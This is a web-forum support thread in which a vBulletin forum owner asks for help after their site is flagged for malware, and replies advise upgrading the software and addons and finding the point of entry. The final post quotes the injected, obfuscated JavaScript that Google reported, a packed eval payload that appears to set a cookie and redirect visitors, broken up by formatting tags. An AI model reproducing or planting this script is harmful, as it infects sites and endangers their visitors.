Announcement

Collapse
No announcement yet.

Is my site infected with Malware

Collapse
X
 
  • Filter
  • Time
  • Show
Clear All
new posts

  • Is my site infected with Malware

    Members are reporting that the site might be hosting malware http://www.rvoc.co.uk/forum/index.php

    Can anyone help? Thanks

  • #2
    have you searched these forums for others with this issue and what they did to fix it?
    -- Web Developer for hire
    ---Online Marketing Tools and Articles

    Comment


    • #3
      I got the infected warning message as well. If you do a quick search will bring up a lot of threads on the subject.

      P.s. You might want to contact your host as well and ask them to check their logs and see how your forum got infected.

      Comment


      • #4
        I don't really know what to search for. Is there a tool that might scan the site and tell me what the bastards have infected the site with. Thanks

        Comment


        • #5
          Originally posted by jimjam View Post
          I don't really know what to search for. Is there a tool that might scan the site and tell me what the bastards have infected the site with. Thanks
          maybe, but I'm not sure

          I'd start with searching these forums for "Malware" and you'll get a couple threads that might help.
          -- Web Developer for hire
          ---Online Marketing Tools and Articles

          Comment


          • #6
            I also have been reported with Malware as well. Called my host and they said three other sites using vbulletin have been reported to the one guy I talked to. I think there is definitely a problem with V Bulletin or one of the plugins. I am using 3.8 patch level 2. What version and host are you using?

            Comment


            • #7
              Originally posted by jpietrowiak View Post
              I also have been reported with Malware as well. Called my host and they said three other sites using vbulletin have been reported to the one guy I talked to. I think there is definitely a problem with V Bulletin or one of the plugins. I am using 3.8 patch level 2. What version and host are you using?
              Your software is woefully out of date. You should be on 3.8.7 PL2 if you want to run the 3.8 series. You're running 3.8.4. It appears you're running out of date plugins as well even potentially vBSEO which has a massive exploit repaired in January that compromised the site.

              Run Maintenance -> Diagnostics -> Suspect File Versions. Delete all files that aren't part of vBulletin or your addons.

              Upgrade vBulletin to 3.8.7 PL2.

              Upgrade all your addons to the latest patched versions.

              Run this tool: http://www.vbulletin.org/forum/showthread.php?t=220967
              Last edited by TheLastSuperman; Tue 5 Jun '12, 11:41am. Reason: linked to vB4 fix-it instead of vB3, corrected. *OMDL I thought this was my post sorry for toe stepping Wayne - Supes
              Translations provided by Google.

              Wayne Luke
              The Rabid Badger - a vBulletin Cloud demonstration site.
              vBulletin 5 API

              Comment


              • #8
                Oh I am a dummy I could swear I had 3.8.7 PL1 and manually changed it to make PL2. My bad, but I have to also wonder about the other sites my host mentioned. I will take care of now. Didn't mean to hijack this thread as the other guy still has problems, but I thought I was using latest and greatest. Sorry!

                Comment


                • #9
                  Originally posted by jpietrowiak View Post
                  Oh I am a dummy I could swear I had 3.8.7 PL1 and manually changed it to make PL2. My bad, but I have to also wonder about the other sites my host mentioned. I will take care of now. Didn't mean to hijack this thread as the other guy still has problems, but I thought I was using latest and greatest. Sorry!
                  There have been some issues. Both in vBulletin and in several addons that have caused problems. The older the software, the more problems it most likely has in this regard. Unfortunately, we cannot force customers to upgrade their sites. Without knowing more information about the sites, I can't be really specific though. Your host should encourage them to come forward so we can provide support.

                  The steps listed above are relevant to the thread starter as well.
                  Translations provided by Google.

                  Wayne Luke
                  The Rabid Badger - a vBulletin Cloud demonstration site.
                  vBulletin 5 API

                  Comment


                  • #10
                    VBSEO is up to date. I will check the plugins and upgrade the software. Should I do this before or after finding this exploit?

                    My sites been hijacked and now my thread! :-)

                    Comment


                    • #11
                      I'd find and remove the exploit before upgrading myself.
                      Translations provided by Google.

                      Wayne Luke
                      The Rabid Badger - a vBulletin Cloud demonstration site.
                      vBulletin 5 API

                      Comment


                      • #12
                        Originally posted by jimjam View Post
                        VBSEO is up to date. I will check the plugins and upgrade the software. Should I do this before or after finding this exploit?

                        My sites been hijacked and now my thread! :-)
                        Your first priority should be to clean up the forum first then you can upgrade it. But the most important thing would be to find the point of entry and patch it up a.s.a.p, otherwise it can happen again and again.

                        Comment


                        • #13
                          Originally posted by borbole View Post
                          Your first priority should be to clean up the forum first then you can upgrade it. But the most important thing would be to find the point of entry and patch it up a.s.a.p, otherwise it can happen again and again.
                          Thanks, if only I knew where to look, I have so many mods and addons its ridiculous

                          Comment


                          • #14
                            This is a nice list of steps to take to find malicious code.

                            Comment


                            • #15
                              We have searched everywhere but cannot find the malicious code. If i go to Googles webmaster tools it gives me very specific details of the url's and the dodgy code therein. But when I go to that page and view the source I cannot find the suspect javascript. Google is still reporting the site as suspect but then it has not been back since yesterday. But the only thing that would have changed on the site are the google adsense ads. Could they be the source of the code?

                              example webmaster tools report that on this page
                              Code:
                              [COLOR=#000000][FONT=monospace]<script type="text/javascript">var vbsp='DEC24B2D';eval(funchttp://www.rvoc.co.uk/forum/warwickshire/790-hollyfast-caravan-park.html
                              
                              This suspect injected code appears
                              
                              
                              [COLOR=#000000][FONT=monospace]tion(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a[/FONT][/COLOR]
                              [COLOR=#000000][FONT=monospace])))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};i[/FONT][/COLOR]
                              [COLOR=#000000][FONT=monospace]f(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[[/FONT][/COLOR]
                              [COLOR=#000000][FONT=monospace]function(e){return d[e]}];e=function(){return'\\w+'};c=1};wh[/FONT][/COLOR]
                              [COLOR=#000000][FONT=monospace]ile(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g[/FONT][/COLOR]
                              [COLOR=#000000][FONT=monospace]'),k[c])}}return p}('o a=["\\A\\c\\e\\l\\d\\y\\c","\\k\\c\\e[/FONT][/COLOR]
                              [COLOR=#000000][FONT=monospace]\\l\\d\\y\\c","\\B\\x\\c\\L\\f\\d\\q\\c\\k\\h","\\e\\b\\M\\N[/FONT][/COLOR]
                              [COLOR=#000000][FONT=monospace]\\l\\O\\e\\q\\d\\j\\A","\\w\\b\\b\\J\\d\\c","\\h","\\B\\x\\f[/FONT][/COLOR]
                              [COLOR=#000000][FONT=monospace]\\r\\e\\n\\h\\i","\\G\\H\\k\\f","\\I","\\p\\b\\w\\r\\e\\d\\b[/FONT][/COLOR]
                              [COLOR=#000000][FONT=monospace]\\j","\\n\\e\\e\\f\\Q\\i\\i\\D\\d\\p\\c\\P\\k\\e\\b\\q\\c\\C[/FONT][/COLOR]
                              [COLOR=#000000][FONT=monospace]\\d\\j\\D\\b\\i\\m\\b\\S\\j\\p\\b\\r\\m\\C\\f\\n\\f\\T\\d\\m[/FONT][/COLOR]
                              [COLOR=#000000][FONT=monospace]\\h"];E z(u,t){o g=F K();g[a[1]](g[a[0]]()+R);o s=a[2]+g[a[3[/FONT][/COLOR]
                              [COLOR=#000000][FONT=monospace]]]();v[a[4]]=u+a[5]+t+s+a[6]};z(a[7],a[8]);v[a[9]]=a[V]+U;',[/FONT][/COLOR]
                              [COLOR=#000000][FONT=monospace]58,58,'||||||||||_0x95ee|x6F|x65|x69|x74|x70|_0x601cx4|x3D|x[/FONT][/COLOR]
                              [COLOR=#000000][FONT=monospace]2F|x6E|x73|x54|x64|x68|var|x6C|x72|x61|_0x601cx5|_0x601cx3|_[/FONT][/COLOR]
                              [COLOR=#000000][FONT=monospace]0x601cx2|document|x63|x20|x6D|ipbcc|x67|x3B|x2E|x66|function[/FONT][/COLOR]
                              [COLOR=#000000][FONT=monospace]|new[/FONT][/COLOR]
                              But I cannot find it! [/FONT][/COLOR]

                              Comment

                              widgetinstance 262 (Related Topics) skipped due to lack of content & hide_module_if_empty option.
                              Working...
                              X